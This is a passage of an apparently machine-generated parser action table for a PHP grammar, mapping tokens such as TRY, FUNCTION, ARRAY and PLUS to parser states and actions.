18,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,339,340,341,342,345,346,347,348,350,352,355,360,361,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,416,418,419,426,427,428,430,431,433,434,437,441,442,443,445,449,450,451,452,453,454,458,459,461,462,463,464,467,474,475,477,478,480,481,482,484,486,48
7,489,493,495,496,497,498,500,501,511,516,524,525,527,529,530,531,536,544,546,547,548,549,562,563,564,565,566,569,570,595,596,598,600,612,613,614,618,619,620,621,622,624,625,630,631,632,633,634,636,637,638,639,640,652,657,670,671,672,673,675,676,685,686,695,698,701,702,703,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,740,741,742,743,746,747,759,762,763,775,776,780,785,786,787,789,791,792,794,798,801,802,804,805,807,811,813,814,817,818,819,820,822,825,827,829,832,833,835,836,841,843,846,854,856,862,867,868,869,870,871,873,874,875,876,877,878,879,881,882,883,884,896,897,900,902,903,906,908,909,910,911,912,913,914,915,917,918,919,926,934,935,937,938,939,940,945,948,951,953,954,955,958,960,961,962,963,964,965,967,970,972,973,975,],[-443,10,-3,-2,-4,-5,-6,-50,-362,-443,130,10,164,166,168,-47,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,-190,275,-443,-429,-430,10,-23,292,-20,295,-14,-15,-48,-443,-38,345,-40,346,-42,347,348,-95,-96,352,-100,-102,355,-104,-443,361,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,-332,-338,-339,-340,-341,-347,-348,-363,-227,-228,441,-349,-8,-443,10,-364,-428,-30,-22,-24,-25,-26,449,-11,-12,-16,-443,-443,-244,-248,-250,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,489,-72,-73,-75,-39,-41,-43,-44,-97,-45,-46,10,-56,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,-345,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,-7,10,-9,-209,-28,570,-19,-429,-21,-402,-378,-379,-382,-383,-384,-389,-430,-13,-17,10,-184,-221,-243,-245,-238,-320,10,-443,-94,-99,-101,-103,634,-443,10,-353,-117,-182,-234,-229,-189,-443,-230,-252,-333,-336,-337,-346,-443,-218,-235,-236,-240,-10,703,-29,-3
92,-393,-380,-390,-18,-443,-443,-249,-319,-33,-70,-443,748,-74,-37,755,758,-98,-49,-443,-53,-57,-60,-443,-118,-111,-160,-161,-162,-196,-191,-194,-205,-223,-210,-231,-232,-211,-27,-403,-404,-405,-406,-407,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-443,-62,10,-220,10,820,-51,-55,10,-119,-110,844,849,-145,853,-231,-193,-232,-199,-222,-212,-213,-214,-215,-394,-31,-64,10,-246,-247,867,-34,10,-85,876,878,-443,882,-443,-443,-109,890,893,-195,-443,-65,-71,10,-36,-83,-443,876,-443,-92,-93,-86,-87,915,10,-61,10,10,-144,-143,-224,-216,-217,935,-443,-35,-76,-443,10,-443,10,-88,-54,-108,-271,-147,10,-32,10,10,954,10,-146,-142,-63,963,-84,-443,968,969,971,-443,-77,10,968,-443,976,10,-52,10,]),'TRY':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,31,-3,-2,-4,-5,-6,-50,-443,31,-47,-443,31,-23,-48,-38,-40,-42,-443,-8,-443,31,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,31,-56,-7,31,-9,-28,31,31,-443,31,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,31,31,-51,-55,31,-110,-31,-64,31,-34,31,-85,-443,-443,-443,-109,-65,-71,31,-36,-83,-443,-443,-92,-93,-86,-87,31,-61,31,31,-443,-35,-76,-443,31,-443,31,-88,-54,-108,31,-32,31,31,31,-63,-84,-443,-443,-77,31,-443,31,-52,31,]),'THROW':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,
822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,32,-3,-2,-4,-5,-6,-50,-443,32,-47,-443,32,-23,-48,-38,-40,-42,-443,-8,-443,32,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,32,-56,-7,32,-9,-28,32,32,-443,32,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,32,32,-51,-55,32,-110,-31,-64,32,-34,32,-85,-443,-443,-443,-109,-65,-71,32,-36,-83,-443,-443,-92,-93,-86,-87,32,-61,32,32,-443,-35,-76,-443,32,-443,32,-88,-54,-108,32,-32,32,32,32,-63,-84,-443,-443,-77,32,-443,32,-52,32,]),'DECLARE':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,33,-3,-2,-4,-5,-6,-50,-443,33,-47,-443,33,-23,-48,-38,-40,-42,-443,-8,-443,33,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,33,-56,-7,33,-9,-28,33,33,-443,33,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,33,33,-51,-55,33,-110,-31,-64,33,-34,33,-85,-443,-443,-443,-109,-65,-71,33,-36,-83,-443,-443,-92,-93,-86,-87,33,-61,33,33,-443,-35,-76,-443,33,-443,33,-88,-54,-108,33,-32,33,33,33,-63,-84,-443,-443,-77,33,-443,33,-52,33,]),'FUNCTION':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,29
1,292,295,304,336,345,346,347,348,351,352,355,356,360,361,373,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,519,522,523,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,650,654,655,657,658,659,662,663,665,666,667,668,669,670,671,672,679,682,693,703,740,741,742,746,748,759,762,763,774,776,777,778,788,803,806,811,813,814,820,822,825,826,832,835,836,841,844,849,853,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,890,893,907,908,909,910,911,912,913,914,915,917,918,930,934,935,937,938,940,946,951,954,955,962,963,964,966,967,968,972,973,974,975,977,],[-443,34,-3,-2,-4,-5,-6,110,-50,-443,110,110,110,110,110,-47,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,-443,110,34,-23,110,-48,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,-38,-40,-42,-443,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,-8,-443,34,-30,-22,-24,-25,-26,110,-11,-12,110,110,-39,-41,-43,-44,110,-45,-46,110,34,-56,-443,110,110,110,110,110,110,110,110,-7,34,-9,110,110,-28,110,110,110,110,110,110,110,-443,110,-443,-443,-130,110,110,110,110,110,110,-10,-29,-443,-443,110,110,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-443,-443,-136,-111,-129,784,-154,-155,-159,-163,-164,-165,-166,-160,-161,-162,110,110,110,-27,-443,-62,34,34,110,-51,-55,34,-443,-110,-135,842,-158,110,110,-31,-64,110,-34,110,-85,110,-443,-443,-443,-109,-139,-132,-134,110,-65,-71,110,-36,-83,-443,-443,-92,-93,-86,-87,34,-61,34,34,-138,-141,110,-443,-35,-76,-443,34,-443,34,-88,-54,-108,-133,110,-32,34,34,34,-140,-63,-84,-443,-443,-77,34,-131,-443,-157,34,-52,-137,34,-156,]),'INTERFACE':([0,2,3,4,5,6,7,10,13,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,500,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741
,742,746,759,762,763,776,811,813,820,825,832,835,836,841,862,867,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,37,-3,-2,-4,-5,-6,-50,-443,-47,-443,37,-23,-48,-38,-40,-42,-443,-8,-443,37,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,37,-56,-7,37,-9,-28,-443,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,37,37,-51,-55,37,-110,-31,-64,-34,-85,-443,-443,-443,-109,-65,-71,-36,-83,-443,-443,-92,-93,-86,-87,37,-61,37,37,-443,-35,-76,-443,37,-443,37,-88,-54,-108,-32,37,37,37,-63,-84,-443,-443,-77,37,-443,37,-52,37,]),'TRAIT':([0,2,3,4,5,6,7,10,13,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,500,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,820,825,832,835,836,841,862,867,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,38,-3,-2,-4,-5,-6,-50,-443,-47,-443,38,-23,-48,-38,-40,-42,-443,-8,-443,38,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,38,-56,-7,38,-9,-28,-443,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,38,38,-51,-55,38,-110,-31,-64,-34,-85,-443,-443,-443,-109,-65,-71,-36,-83,-443,-443,-92,-93,-86,-87,38,-61,38,38,-443,-35,-76,-443,38,-443,38,-88,-54,-108,-32,38,38,38,-63,-84,-443,-443,-77,38,-443,38,-52,38,]),'NEW':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375
,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,40,-3,-2,-4,-5,-6,40,-50,-443,40,40,40,40,40,-47,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,-443,40,40,-23,40,-48,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,-38,-40,-42,-443,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,-8,-443,40,-30,-22,-24,-25,-26,40,-11,-12,40,40,-39,-41,-43,-44,40,-45,-46,40,40,-56,40,40,40,40,40,40,40,40,-7,40,-9,40,40,-28,40,40,40,40,40,40,40,-443,40,40,40,40,40,40,40,-10,-29,-443,-443,40,40,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,40,40,40,-27,-443,-62,40,40,40,-51,-55,40,-110,40,40,-31,-64,40,-34,40,-85,40,-443,-443,-443,-109,40,-65,-71,40,-36,-83,-443,-443,-92,-93,-86,-87,40,-61,40,40,40,-443,-35,-76,-443,40,-443,40,-88,-54,-108,40,-32,40,40,40,-63,-84,-443,-443,-77,40,-443,40,-52,40,]),'CLONE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,8
26,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,41,-3,-2,-4,-5,-6,41,-50,-443,41,41,41,41,41,-47,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,-443,41,41,-23,41,-48,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,-38,-40,-42,-443,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,-8,-443,41,-30,-22,-24,-25,-26,41,-11,-12,41,41,-39,-41,-43,-44,41,-45,-46,41,41,-56,41,41,41,41,41,41,41,41,-7,41,-9,41,41,-28,41,41,41,41,41,41,41,-443,41,41,41,41,41,41,41,-10,-29,-443,-443,41,41,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,41,41,41,-27,-443,-62,41,41,41,-51,-55,41,-110,41,41,-31,-64,41,-34,41,-85,41,-443,-443,-443,-109,41,-65,-71,41,-36,-83,-443,-443,-92,-93,-86,-87,41,-61,41,41,41,-443,-35,-76,-443,41,-443,41,-88,-54,-108,41,-32,41,41,41,-63,-84,-443,-443,-77,41,-443,41,-52,41,]),'LIST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,491,500,501,528,532,533,535,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,751,752,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,42,-3,-2,-4,-5,-6,42,-50,-443,42,42,42,42,42,-47
,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,-443,42,42,-23,42,-48,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,-38,-40,-42,-443,42,42,42,42,42,42,42,42,42,42,42,42,42,396,42,42,42,42,42,42,42,42,-8,-443,42,-30,-22,-24,-25,-26,42,-11,-12,42,42,-39,-41,-43,-44,42,-45,-46,42,42,-56,42,42,42,42,42,42,42,42,-7,42,-9,42,42,-28,42,42,42,42,42,42,42,627,-443,42,42,42,396,396,42,42,42,42,-10,-29,-443,-443,42,42,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,42,42,42,-27,-443,-62,42,42,42,627,396,-51,-55,42,-110,42,42,-31,-64,42,-34,42,-85,42,-443,-443,-443,-109,42,-65,-71,42,-36,-83,-443,-443,-92,-93,-86,-87,42,-61,42,42,42,-443,-35,-76,-443,42,-443,42,-88,-54,-108,42,-32,42,42,42,-63,-84,-443,-443,-77,42,-443,42,-52,42,]),'ARRAY':([0,2,3,4,5,6,7,9,10,11,13,15,19,23,24,25,28,29,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,81,114,115,119,120,121,128,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,173,179,180,191,192,193,194,195,196,197,198,199,200,201,202,205,210,217,218,222,230,244,245,246,251,265,267,268,270,275,276,277,284,285,286,287,288,289,291,292,294,295,296,304,336,345,346,347,348,351,352,354,355,356,360,361,365,369,371,375,389,393,404,407,409,423,424,425,429,432,441,442,443,444,446,449,455,456,457,465,468,477,479,485,487,488,489,490,491,499,500,501,503,504,513,517,528,532,533,535,537,540,545,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,601,602,613,614,616,617,620,621,622,629,630,634,636,637,638,639,640,645,646,653,656,657,661,679,682,693,703,734,735,740,741,742,746,748,751,752,759,762,763,764,771,773,776,781,796,803,806,811,813,814,820,822,825,826,831,832,835,836,839,841,851,852,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,892,894,898,899,907,908,909,910,911,912,913,914,915,917,918,
924,925,927,928,931,934,935,937,938,940,944,951,954,955,962,963,964,967,969,971,972,973,975,976,],[-443,44,-3,-2,-4,-5,-6,44,-50,117,-443,117,44,44,44,44,44,-47,44,117,44,44,44,44,44,44,117,117,44,44,44,44,44,44,44,44,44,44,44,44,44,44,117,-443,117,44,44,-23,117,44,-48,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,-38,-40,-42,117,117,-443,44,44,44,44,44,44,44,44,44,44,44,44,44,117,117,44,117,117,117,44,44,44,44,44,44,44,-8,-443,44,117,-30,-22,-24,-25,-26,44,-11,467,-12,117,44,44,-39,-41,-43,-44,44,-45,467,-46,44,44,-56,117,117,117,44,44,117,44,44,117,44,117,44,44,44,-7,44,-9,44,44,-28,467,467,467,117,467,44,44,44,44,44,44,44,117,117,-443,44,467,117,117,117,44,44,117,117,117,117,117,44,44,44,44,-10,-29,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,117,467,-443,-443,44,44,-33,-70,-443,117,-37,-49,-443,-53,-57,-60,-443,117,467,117,117,-111,117,44,44,44,-27,467,467,-443,-62,44,44,44,117,117,-51,-55,44,467,467,467,-110,117,117,44,44,-31,-64,44,-34,44,-85,44,117,-443,-443,-443,467,-109,467,-443,467,44,-65,-71,44,-36,-83,-443,-443,-92,-93,-86,-87,44,-61,44,44,-443,467,117,-123,44,-443,-35,-76,-443,44,-443,44,-88,-54,-108,467,117,117,467,-122,44,-32,44,44,44,117,-63,-84,-443,-443,-77,44,-443,-126,-128,44,-52,44,-127,]),'LBRACKET':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,39,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,73,84,85,100,101,104,106,107,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,214,218,228,234,235,245,246,251,265,267,268,269,270,271,275,276,277,285,286,287,288,289,291,292,294,295,301,302,303,304,305,336,345,346,347,348,350,351,352,354,355,356,359,360,361,375,389,399,404,406,407,413,418,422,423,425,428,429,431,432,437,441,442,443,444,445,446,447,449,455,456,457,468,472,477,479,480,
481,482,485,487,488,489,490,500,501,503,525,528,532,549,553,554,556,557,559,560,562,563,564,565,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,618,620,621,622,628,630,634,636,637,638,639,640,646,657,679,681,682,683,684,685,686,693,695,698,701,702,703,734,735,740,741,742,743,746,748,753,759,762,763,764,771,773,776,798,801,802,803,804,805,806,811,813,814,817,818,820,822,825,826,832,835,836,839,841,851,855,856,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,900,902,903,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,45,-3,-2,-4,-5,-6,45,-50,-443,45,45,45,45,45,-47,45,205,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,-206,-207,-208,-225,-226,267,-237,-239,-443,45,45,-23,45,-48,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,-38,-40,-42,-443,45,45,45,45,45,45,45,45,45,45,45,45,45,267,45,205,267,205,45,45,45,45,45,45,-227,45,267,-8,-443,45,-30,-22,-24,-25,-26,45,-11,468,-12,-443,-244,-248,45,-250,45,-39,-41,-43,-44,205,45,-45,468,-46,45,205,45,-56,45,45,205,45,205,45,205,-443,550,45,45,-229,45,-230,45,-219,-7,45,-9,45,-209,45,205,-28,468,468,468,468,267,45,45,-221,616,-245,45,45,45,45,45,-443,45,468,-234,45,45,-443,693,205,45,45,45,45,-218,-235,-236,-240,-10,-29,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,-443,-443,45,45,-249,-33,-70,-443,205,-37,-49,-443,-53,-57,-60,-443,468,-111,45,205,45,205,205,-205,-223,45,-210,-231,-232,-211,-27,468,468,-443,-62,45,-220,45,45,205,-51,-55,45,468,468,468,-110,-222,-212,-213,45,-214,-215,45,-31,-64,45,-246,-247,-34,45,-85,45,-443,-443,-443,468,-109,468,205,-443,468,45,-65,-71,45,-36,-83,-443,-443,-92,-93,-86,-87,45,-61,45,45,468,-224,-216,-217,45,-443,-35,-76,-443,45,-443,45,-88,-54,-108,468,468,45,-32,45,45,45,-63,-84,-443,-443,-77,45,-443,45,-52,45,])
,'PLUS':([0,2,3,4,5,6,7,9,10,12,13,17,19,23,24,25,28,29,32,35,39,41,43,44,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,67,68,69,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,114,116,117,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,165,166,167,168,169,178,180,181,187,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,212,213,214,216,218,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,245,246,247,248,249,250,251,252,253,259,265,267,268,269,270,271,273,275,276,277,278,279,283,285,286,287,288,289,291,292,294,295,299,300,301,302,303,304,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,342,343,344,345,346,347,348,351,352,354,355,356,360,361,374,375,376,377,378,379,380,381,382,383,384,385,386,388,389,390,392,402,404,407,414,415,416,417,418,419,423,425,426,427,428,429,430,431,432,433,434,437,439,440,441,442,443,444,445,446,449,450,452,453,454,455,456,457,458,459,461,462,463,464,467,468,477,478,479,480,481,482,483,484,485,486,487,488,489,490,494,497,500,501,503,511,524,525,527,528,529,530,531,532,536,538,539,544,546,547,548,549,552,553,556,557,558,559,560,561,562,563,564,565,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,600,602,606,607,613,614,616,617,618,619,620,621,622,623,625,630,634,636,637,638,639,640,646,657,673,674,675,676,677,679,682,685,686,693,695,698,701,702,703,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,734,735,736,737,738,740,741,742,743,745,746,748,759,762,763,764,771,773,776,789,791,792,794,795,798,800,801,802,803,804,805,806,807,808,809,810,811,813,814,817,818,820,822,825,826,832,835,836,839,841,851,854,856,860,861,862,867,868,869,870,871,873,874,875,876
,877,878,881,882,883,884,894,900,902,903,904,905,907,908,909,910,911,912,913,914,915,917,918,919,924,926,928,934,935,936,937,938,940,945,951,954,955,962,963,964,967,972,973,975,],[-443,46,-3,-2,-4,-5,-6,46,-50,-362,-443,142,46,46,46,46,46,-47,46,-429,-180,46,-251,-430,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,-344,46,46,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,142,-190,-443,-429,-430,46,46,-23,46,-48,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,-38,142,-40,142,-42,142,142,-443,142,-370,46,46,46,46,46,46,46,46,46,46,46,46,-323,-324,46,-443,-185,-186,-187,-192,-225,-228,-198,46,142,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,142,46,46,142,142,142,142,46,142,-348,-363,46,46,46,-227,46,-228,-349,-8,-443,46,-364,-428,142,-30,-22,-24,-25,-26,46,-11,455,-12,142,-443,-443,-244,-248,46,-250,142,142,142,142,142,142,142,142,142,-297,-298,-299,-300,-301,142,142,-304,142,142,142,142,142,142,142,142,-313,-314,142,46,142,142,142,142,-39,-41,-43,-44,46,-45,455,-46,46,46,-56,142,46,142,142,142,142,142,142,142,142,142,142,142,-183,46,-197,-188,-253,46,46,142,142,-345,142,-443,-352,46,46,-365,-385,-229,46,-366,-230,46,-357,-358,-219,142,142,-7,46,-9,46,-209,46,-28,142,-429,580,-402,455,455,455,-378,-379,-382,-383,-384,-389,-430,455,46,-184,46,-221,-243,-245,142,-238,46,142,46,46,46,46,142,142,-443,46,455,-353,142,-234,-229,46,-189,-443,-230,46,-252,142,142,-333,-336,-337,-346,-443,142,-361,46,46,142,46,46,142,-218,-235,-236,-240,-10,-29,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,-392,-393,580,-380,-390,455,580,-402,-443,-443,46,46,-249,142,-33,-70,-443,142,142,-37,-49,-443,-53,-57,-60,-443,455,-111,-196,142,-191,-194,142,46,46,-205,-223,46,-210,-231,-232,-211,-27,580,580,580,580,580,580,580,580,-411,-412,-413,-414,-415,580,580,-418,580,580,580,580,580,580,580,580,
-427,-381,-391,-395,455,455,-365,-366,-386,-443,-62,46,-220,142,46,46,-51,-55,46,455,455,455,-110,-231,-193,-232,142,142,-222,142,-212,-213,46,-214,-215,46,-394,580,-402,580,-31,-64,46,-246,-247,-34,46,-85,46,-443,-443,-443,455,-109,455,-195,-443,455,46,-65,-71,46,-36,-83,-443,142,-443,-92,-93,-86,-87,46,-61,46,46,455,-224,-216,-217,580,142,46,-443,-35,-76,-443,46,-443,46,-88,-54,-108,-271,455,580,455,46,-32,142,46,46,46,580,-63,-84,-443,-443,-77,46,-443,46,-52,46,]),'MINUS':([0,2,3,4,5,6,7,9,10,12,13,17,19,23,24,25,28,29,32,35,39,41,43,44,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,67,68,69,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,114,116,117,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,165,166,167,168,169,178,180,181,187,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,212,213,214,216,218,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,245,246,247,248,249,250,251,252,253,259,265,267,268,269,270,271,273,275,276,277,278,279,283,285,286,287,288,289,291,292,294,295,299,300,301,302,303,304,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,33